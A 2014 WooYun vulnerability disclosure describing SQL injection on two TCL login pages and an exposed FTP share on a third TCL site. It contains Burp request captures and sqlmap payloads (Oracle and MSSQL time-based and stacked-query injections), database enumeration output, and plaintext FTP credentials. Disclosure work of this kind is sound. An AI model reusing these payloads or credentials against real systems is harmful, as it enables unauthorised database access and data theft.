漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2014-048357
漏洞标题:TCL多分站漏洞大礼包(SQL注入、信息泄露)
相关厂商:TCL官方网上商城
漏洞作者: Mr.leo
提交时间:2014-01-10 18:22
修复时间:2014-02-24 18:22
公开时间:2014-02-24 18:22
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:15
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2014-01-10: 细节已通知厂商并且等待厂商处理中
2014-01-10: 厂商已经确认,细节仅向厂商公开
2014-01-20: 细节向核心白帽子及相关领域专家公开
2014-01-30: 细节向普通白帽子公开
2014-02-09: 细节向实习白帽子公开
2014-02-24: 细节向公众公开
简要描述:
TCL多分站漏洞大礼包(SQL注入、信息泄露)
详细说明:
站点:
http://workflow.tclhk.com/workflow/Login.aspx TCL系统工作流程系统
UserName参数没有过滤,导致注射
burp抓包数据
POST /workflow/Login.aspx HTTP/1.1
Content-Length: 322
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://workflow.tclhk.com/workflow/Login.aspx
Host: workflow.tclhk.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
buCancel=%c8%a1%cf%fb&buLogin=%b5%c7%c8%eb&Passwd=g00dPa%24%24w0rD&UserName=123&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEWBQKOivWwAQKvruq2CALemv37AgLHye3oAgKQ7PK5BwCUxt0OjVxhYJBbbrGPMTjQNEWr&__VIEWSTATE=/wEPDwUJOTEyMTgyMDM1ZGQNCVe48CQTojD%2bmXal4uBDVhcd7Q%3d%3d
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: POST
Parameter: UserName
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUJOTEyMTgyMDM1ZGQ
NCVe48CQTojD+mXal4uBDVhcd7Q==&__EVENTVALIDATION=/wEWBQKOivWwAQKvruq2CALemv37AgLH
ye3oAgKQ7PK5BwCUxt0OjVxhYJBbbrGPMTjQNEWr&UserName=123' AND 9555=DBMS_PIPE.RECEIV
E_MESSAGE(CHR(72)||CHR(83)||CHR(83)||CHR(80),5) AND 'UHfe'='UHfe&Passwd=123&buLo
gin=????
---
[09:33:39] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Oracle
[09:33:39] [INFO] fetching current user
[09:33:39] [INFO] resumed: SO
current user: 'SO'
[09:33:39] [INFO] fetching current database
[09:33:39] [INFO] resumed: SO
current schema (equivalent to database on Oracle): 'SO'
[09:33:39] [WARNING] schema names are going to be used on Oracle for enumeration
as the counterpart to database names on other DBMSes
[09:33:39] [INFO] fetching database (schema) names
[09:33:39] [INFO] fetching number of databases
[09:33:39] [WARNING] time-based comparison needs larger statistical model. Makin
g a few dummy requests, please wait..
[09:33:46] [WARNING] it is very important not to stress the network adapter's ba
ndwidth during usage of time-based queries
[09:33:54] [WARNING] in case of continuous data retrieval problems you are advis
ed to try a switch '--no-cast' and/or switch '--hex'
[09:33:54] [ERROR] unable to retrieve the number of databases
[09:33:54] [INFO] falling back to current database
[09:33:54] [INFO] fetching current database
available databases [1]:
[*] SO
Database: SO
[728 tables]
+-------------------------------------------------+
| ACL_table |
| ADMIN |
| ANSWER_GROUP |
| ANSWER_GROUP_DETAIL |
| Agent |
| Aircraft |
| Apply |
| Association |
| Author |
| BANNERDATA |
| BID |
| BOOK_AUTHORS |
| BOOK_COPIES |
| BUYER |
| CE_table |
| CONTACT |
| COURSE_SECTION |
| CPG_categories |
| CPG_usergroups |
| CPG_users |
| CUST_HIST |
| Campus |
| Channel_Data |
| CheckType |
| ClassificationScheme |
| ClientsTable |
| Component |
| ConsultantsTable |
| CustomerCards |
| DEPENDENT |
| DIM_TYPE |
| DSProp_table |
| DWE_Corr_Sets |
| DWE_Corr_Tokens |
| DWE_Delay_Timers |
| DWE_Predecessors |
| DWE_Roles |
| DWE_Subscriptions |
| DWE_Task_Attributes |
| DWE_Tasks |
| DWE_WF_Attributes |
| DWE_Workflow_Documents |
| D_Comment |
| D_Unit |
| Defect |
| Departure |
| Descriptions |
| Descriptions_Scripts |
| Descriptions_Variants |
| Desert |
| Domain |
| Dragon_users |
| EMPLOYEE |
| EMPLOYEES |
| ENROLLMENT |
| EmailAddress |
| ExternalLink |
| Factory_Master |
| Factory_Output |
| FindCriteria |
| Flight |
| FoundLists |
| GDirectedRoute |
| Gallery |
| LIBRARY_BRANCH |
| LINEITEM |
| MEMBER |
| MonitorStatus |
| ORDERLINES |
| Orders |
| PERMISSION |
| PN |
| PN_Data |
| POINT_SET |
| POSITION |
| PREFIX_order_return_state_lang |
| PREFIX_tab |
| PREFIX_tab_lang |
| PREFIX_timezone |
| PROFILE |
| PUBLISHER |
| PZ |
| Products |
| PropColumnMap |
| Propdesc_table |
| QRTZ_CALENDARS |
| QRTZ_JOB_DETAILS |
| QRTZ_LOCKS |
| QRTZ_TRIGGER_LISTENERS |
| R1Size |
| R1Sum |
| R2IDF |
| R2Weights |
| RegistryPackage |
| River |
| SALES |
| SCALE |
| SCRIPT |
| SIGNON |
| SS_orders |
| SUPPORT_INCIDENTS |
| Sea |
| ServiceBinding |
| Severity |
| Simple_Response |
| Slot |
| SpecialityTable |
| Station_Data |
| Student |
| Students |
| THOT_CATEGORY |
| THOT_DEEP |
| THOT_LANGUAGE |
| THOT_SOURCE |
| THOT_SUB_MENU |
| THOT_YEAR |
| Tasks |
| Thumbnail |
| ThumbnailKeyword |
| UM_PERMISSIONS |
| UM_ROLES |
| UM_ROLE_ATTRIBUTES |
| UM_USERS |
| UM_USER_ATTRIBUTES |
| UM_USER_ROLES |
| UserFields |
| User_ |
| Users |
| Variants |
| Volume |
| ZENTRACK_VARFIELD_IDX |
| access_control |
| account_permissions |
| account_transaction |
| action_attribute |
| action_element |
| actions |
| aggtest |
| applications |
| array_data |
| array_probe |
| artifact |
| artikel |
| ask |
| assignment |
| attrs |
| audio |
| audit |
| audittrail |
| aut |
| autore |
| backend |
| backend_users |
| backenduser |
| backgroundJob_table |
| bbs |
| binaries |
| biosample |
| bkp_Item |
| bkp_ItemReplication |
| bkp_RS_Clusters |
| bkp_ResourceFolder |
| bombing |
| book |
| books |
| bugs |
| cards |
| cart_table |
| categories_posts |
| cc_config |
| cdv_marker |
| cdv_passport_group |
| cdv_passport_set |
| certificates |
| changePrix |
| changeTva |
| channelitems |
| chat_config |
| chat_messages |
| chat_users |
| checksum_results |
| child_configs |
| cities |
| client |
| clients |
| clubconfig |
| cmAvailableServiceBindingSiteNodeTypeDefinition |
| cmContent |
| cmContentVersionDigitalAsset |
| cmDigitalAsset |
| cmLanguage |
| cmRepository |
| cmRepositoryLanguage |
| cmServiceBinding |
| cmServiceDefinition |
| cmSiteNode |
| cmSiteNodeTypeDefinition |
| cmts_track |
| cocktail |
| collection_item_count |
| colour |
| columns_priv |
| combustible |
| command |
| commissionEmployees |
| company |
| computers |
| config_seq |
| configuration |
| connectorassocs |
| content |
| correo |
| coupon |
| courses |
| cpg132_users |
| cpg_config |
| credential |
| cust_order |
| customers_basket |
| customertax |
| customurl |
| cv_crops |
| cv_pests_diseases |
| datasets |
| datasources |
| dbadmins |
| dealer |
| dealers |
| defaults |
| defertest |
| delivery |
| depositor |
| dept_location |
| dept_locations |
| devel_logsql |
| developers |
| diary |
| div_experiment |
| div_obs_unit_sample |
| div_scoring_tech_type |
| div_stock_parent |
| div_synonym |
| domain_info |
| download |
| dtb_baseinfo |
| dtb_bat_order_daily |
| dtb_bat_order_daily_hour |
| dtb_bat_relate_products |
| dtb_kiyaku |
| dtb_mailtemplate |
| dtb_member |
| dtb_order |
| dtb_other_deliv |
| dtb_question_result |
| dtb_review |
| e107_user |
| egresado |
| email |
| emailinfo |
| enrolls |
| evento |
| ew_menu |
| ew_moduli |
| ewst_sessioni |
| exchangerate |
| expression |
| externallinks |
| ez_webstats_conf |
| ezin_articles |
| f_attributedependencies |
| f_sequence |
| f_spatialcontext |
| federationApplicants |
| feedback |
| filearchive |
| files_config |
| film |
| fk_test_has_pk |
| form_data |
| form_definition |
| form_definition_text |
| form_error |
| forum |
| forum_flag |
| forum_user_activity |
| forum_users |
| fragment |
| framework_email |
| friend_statuses |
| func |
| furniture |
| fusion_user_groups |
| fusion_users |
| ganatlebe_ge |
| general_log |
| geo_Estuary |
| geo_Source |
| geo_desert |
| geo_mountain |
| geo_river |
| geo_sea |
| glas |
| globals |
| grandchild_test |
| graphs |
| graphs_items |
| grp |
| guava_role_assignments |
| guava_roles |
| guava_sysmodules |
| guava_views |
| hardware |
| help_keyword |
| help_relation |
| hero |
| hibernate_unique_key |
| history |
| hostbenchmarks |
| hot_prop |
| hourlyEmployees |
| ibf_admin_sessions |
| ibf_conf_settings |
| ibf_members |
| ibf_members_converge |
| ibf_sessions |
| icq |
| image |
| imageCategoryList |
| index |
| individual |
| info |
| interactions |
| inv_lines_seq |
| investigator |
| invoices_seq |
| ipb_sessions |
| iplinks |
| island |
| islandIn |
| items_template |
| jforum_smilies |
| jforum_topics |
| jforum_vote_desc |
| jiveGroupUser |
| jiveOffline |
| jivePrivate |
| jiveRoster |
| jiveSASLAuthorized |
| jiveUser |
| jiveUserProp |
| job_history |
| job_title |
| joomla_users |
| jos_bannerclient |
| jos_blastchatc_users |
| jos_comprofiler_members |
| jos_contact_details |
| jos_content |
| jos_core_log_items |
| jos_core_log_searches |
| jos_groups |
| jos_joomblog_users |
| jos_menu |
| jos_messages_cfg |
| jos_modules |
| jos_moschat_users |
| jos_newsfeeds |
| jos_poll_date |
| jos_sections |
| jos_users |
| jos_vm_auth_group |
| jos_vm_auth_user_group |
| jos_vm_auth_user_vendor |
| jos_vm_cart |
| jos_vm_category |
| jos_vm_category_xref |
| jos_vm_country |
| jos_vm_creditcard |
| jos_vm_currency |
| jos_vm_manufacturer_category |
| jos_vm_order_payment |
| jos_vm_product_attribute |
| jos_vm_product_category_xref |
| jos_vm_product_discount |
| jos_vm_product_votes |
| jos_vm_shipping_label |
| jos_vm_shopper_group |
| jos_vm_state |
| jos_vm_vendor_category |
| jos_vm_waiting_list |
| jos_weblinks |
| knews_lostpass |
| knjiga |
| korisnici |
| kpro_adminlogs |
| kpro_user |
| kultura_ge |
| languages |
| lc_fields |
| librarian |
| licenses |
| loan |
| login_admin |
| login_admins |
| login_user |
| login_users |
| logins |
| logon |
| logs |
| lokal |
| lookup |
| lost_pass |
| lost_passwords |
| lostpass |
| lostpasswords |
| m_admin |
| m_earnings |
| m_with |
| macassocs |
| maclinks |
| macswitches |
| main |
| mambo_session |
| mambo_users |
| manage |
| manager |
| manufacturer |
| marital_status |
| math |
| maxcodevento |
| mb_users |
| meals |
| memberlist |
| metadata |
| minibbtable_users |
| mitglieder |
| mixins |
| mobile_menu_text |
| most_recent_checksum |
| movie |
| movies |
| mtb_pref |
| mtb_zip |
| mucAffiliation |
| mucRoom |
| mucRoomProp |
| mushroom_NBC_class |
| mushroom_test_results |
| mushroom_testset |
| mushroom_trainset |
| my_county |
| my_lake |
| mybb_users |
| mysql |
| name |
| names |
| networks |
| news_lostpass |
| newsletter |
| newsletter_queue |
| nodes |
| nuke_authors |
| nuke_bbconfig |
| nuke_config |
| nuke_gallery_media_types |
| nuke_gallery_pictures |
| nuke_gallery_template_types |
| nuke_popsettings |
| nuke_users |
| numedia |
| obb_profiles |
| object_types |
| objectcache |
| oc |
| odetails |
| operation |
| order |
| organization |
| organization_type_package_map |
| os |
| osc_categories_description |
| osc_manufacturers_info |
| osc_products |
| osc_products_options_values |
| ostypes |
| outdoor_spaces |
| package |
| page_log_exclusion |
| pagelinks |
| pages |
| parent_test |
| parol |
| participate |
| partners |
| partscustomer |
| partsgroup |
| passes |
| passwds |
| password |
| patient |
| payer |
| payment |
| peer_configs |
| perdorues |
| perdoruesit |
| phonelist |
| phones |
| phorum_session |
| phorum_user |
| phorum_users |
| photoo |
| phpads_clients |
| phpads_config |
| phpbb_categories |
| phpbb_forums |
| phpbb_points_config |
| phpbb_posts_text |
| phpbb_themes |
| physician |
| pictures |
| placex |
| pma_bookmark |
| pma_designer_coords |
| pma_relation |
| pma_table_coords |
| pma_tracking |
| po_seq |
| politics |
| poll_user |
| population |
| powers |
| prereq |
| presence |
| pricegroup |
| primarytest |
| primarytest2 |
| problem |
| proc |
| procedure_data_set |
| procs_priv |
| product_font |
| product_font_multi |
| product_related |
| production_multiple |
| profession1 |
| profiling |
| program |
| project_user_xref |
| province |
| punbb_users |
| pwd |
| pwds |
| qrtz_blob_triggers |
| querycachetwo |
| rating_track |
| readers |
| realtable |
| reciprocal_admin |
| reciprocal_config |
| reciprocal_partnersites |
| records |
| ref |
| reg_user |
| reg_users |
| register |
| registered |
| reguser |
| regusers |
| reports |
| reserve |
| resource_types |
| resources |
| result |
| revision |
| roads_endpoints |
| room |
| rooms |
| routerbenchmarks |
| routers |
| rss_categories |
| rss_category |
| rss_item |
| rss_read |
| salariedEmployees |
| sampleData |
| sbreciprocal_cats |
| schedule |
| scripts |
| searchindex |
| sector |
| servers |
| service_request |
| service_request_log |
| services |
| setting |
| settings |
| sf_guard_user_permission |
| shipto |
| site_environment |
| site_login |
| site_logins |
| site_map_ge |
| site_wtype |
| sitelogin |
| sitelogins |
| sites |
| smallnuke_members |
| smf_members |
| soc_da_polit_ge |
| software |
| sporti_ge |
| stars |
| stars_in_movies |
| statistics |
| store |
| subcategory |
| subscriber |
| superuser |
| sys_acl_actions |
| sys_options_cats |
| sysadmin |
| sysadmins |
| sysmaps_links |
| system |
| sysuser |
| sysusers |
| table |
| tables |
| task_param |
| taxonomy |
| tb_admin |
| tb_administrator |
| tb_login |
| tb_member |
| tb_members |
| tb_user |
| tb_username |
| tb_usernames |
| tb_users |
| tbl |
| tbl_client |
| tbl_clients |
| tbl_country |
| tbl_tech |
| tbl_user |
| tbl_users |
| tblblogentriescategories |
| tblblogsearchstats |
| tblblogtrackbacks |
| tblclient |
| tblclients |
| tbluser |
| tf_log |
| tickers |
| time_zone_name |
| time_zone_transition_type |
| track |
| trackbacks |
| transactions |
| transcache |
| translation |
| transport |
| trigger_depends |
| triggers |
| type |
| usebb_members |
| user_admin |
| user_info |
| user_list |
| user_login |
| user_logins |
| user_names |
| user_types |
| usercontrol |
| userinfo |
| userlist |
| userlogins |
| username |
| usernames |
| users_sessions |
| usuario |
| utilise |
| vars |
| vb_user |
| vbulletin_session |
| vbulletin_user |
| vcd_Comments |
| vcd_CoverTypes |
| vcd_CoversAllowedOnMediatypes |
| vcd_Log |
| vcd_MetaData |
| vcd_PropertiesToUser |
| vcd_UserWishList |
| vcd_VcdToPornstars |
| vendortax |
| voodoo_members |
| vote |
| vrls_partners |
| ways |
| webadmin |
| webadmins |
| webcal_asst |
| webcal_entry_ext_user |
| webcal_entry_log |
| webcal_entry_repeats |
| webcal_import_data |
| webcal_nonuser_cals |
| webcal_report |
| webcal_report_template |
| webcal_user |
| webcal_user_layers |
| webmaster |
| webmasters |
| webuser |
| webusers |
| wh_der_children |
| works_on |
| wp_comments |
| wp_options |
| wp_pod_fields |
| wp_pod_types |
| wp_posts |
| wp_term_relationships |
| zips |
| zoph_people |
| zoph_prefs |
| zoph_users |
| zusti_da_sabuneb_ge |
+-------------------------------------------------+
站点2:
http://www.tcl-elc.com.cn/bc/LogOn.aspx TCL防伪防窜货条码管理系统
txtAdmin参数没有过滤,导致注射
burp抓包数据
POST http://www.tcl-elc.com.cn/bc/LogOn.aspx HTTP/1.1
Host: www.tcl-elc.com.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://www.tcl-elc.com.cn/bc/LogOn.aspx
Cookie: ASP.NET_SessionId=xlkd403jshtubcirgb0pdanm
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 272
__LASTFOCUS=&__VIEWSTATE=%2FwEPDwUJNDI4NjUyODE5D2QWAgIDD2QWAgIHDw8WAh4EVGV4dGVkZGR2kpKV01OCSEyo1G30qi2qv0lmXw%3D%3D&__EVENTTARGET=&__EVENTARGUMENT=&__EVENTVALIDATION=%2FwEWBAKQnOBhAo3z5ZgGAoznisYGArWptJELgyXPVQDRbiKtTsMgWqpHNaWL2Io%3D&txtAdmin=123&Button1=&txtPassword=123
sqlmap identified the following injection points with a total of 100 HTTP(s) requests:
---
Place: POST
Parameter: txtAdmin
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: Button1=1&txtAdmin=1'; WAITFOR DELAY '0:0:5';--&txtPassword=g00dPa$$w0rD&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEWBAKQnOBhAo3z5ZgGAoznisYGArWptJELgyXPVQDRbiKtTsMgWqpHNaWL2Io=&__LASTFOCUS=&__VIEWSTATE=/wEPDwUJNDI4NjUyODE5D2QWAgIDD2QWAgIHDw8WAh4EVGV4dGVkZGR2kpKV01OCSEyo1G30qi2qv0lmXw==
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: Button1=1&txtAdmin=1' WAITFOR DELAY '0:0:5'--&txtPassword=g00dPa$$w0rD&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEWBAKQnOBhAo3z5ZgGAoznisYGArWptJELgyXPVQDRbiKtTsMgWqpHNaWL2Io=&__LASTFOCUS=&__VIEWSTATE=/wEPDwUJNDI4NjUyODE5D2QWAgIDD2QWAgIHDw8WAh4EVGV4dGVkZGR2kpKV01OCSEyo1G30qi2qv0lmXw==
---
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: txtAdmin
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: Button1=1&txtAdmin=1'; WAITFOR DELAY '0:0:5';--&txtPassword=g00dPa$$w0rD&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEWBAKQnOBhAo3z5ZgGAoznisYGArWptJELgyXPVQDRbiKtTsMgWqpHNaWL2Io=&__LASTFOCUS=&__VIEWSTATE=/wEPDwUJNDI4NjUyODE5D2QWAgIDD2QWAgIHDw8WAh4EVGV4dGVkZGR2kpKV01OCSEyo1G30qi2qv0lmXw==
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: Button1=1&txtAdmin=1' WAITFOR DELAY '0:0:5'--&txtPassword=g00dPa$$w0rD&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEWBAKQnOBhAo3z5ZgGAoznisYGArWptJELgyXPVQDRbiKtTsMgWqpHNaWL2Io=&__LASTFOCUS=&__VIEWSTATE=/wEPDwUJNDI4NjUyODE5D2QWAgIDD2QWAgIHDw8WAh4EVGV4dGVkZGR2kpKV01OCSEyo1G30qi2qv0lmXw==
---
current user: 'antifake'
current database: 'HuiZhouLegrani'
available databases [1]:
[*] HuiZhouKa
基于时间的,未深入
站点3:
vmi.tclking.com
存在FTP共享,造成信息泄露
ftp://vendor:vendorpub@vmi.tclking.com/
漏洞证明:
null
修复方案:
过滤参数
版权声明:转载请注明来源 Mr.leo@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:15
确认时间:2014-01-10 23:38
厂商回复:
感谢您的关注,已转交相关单位确认处理。
最新状态:
暂无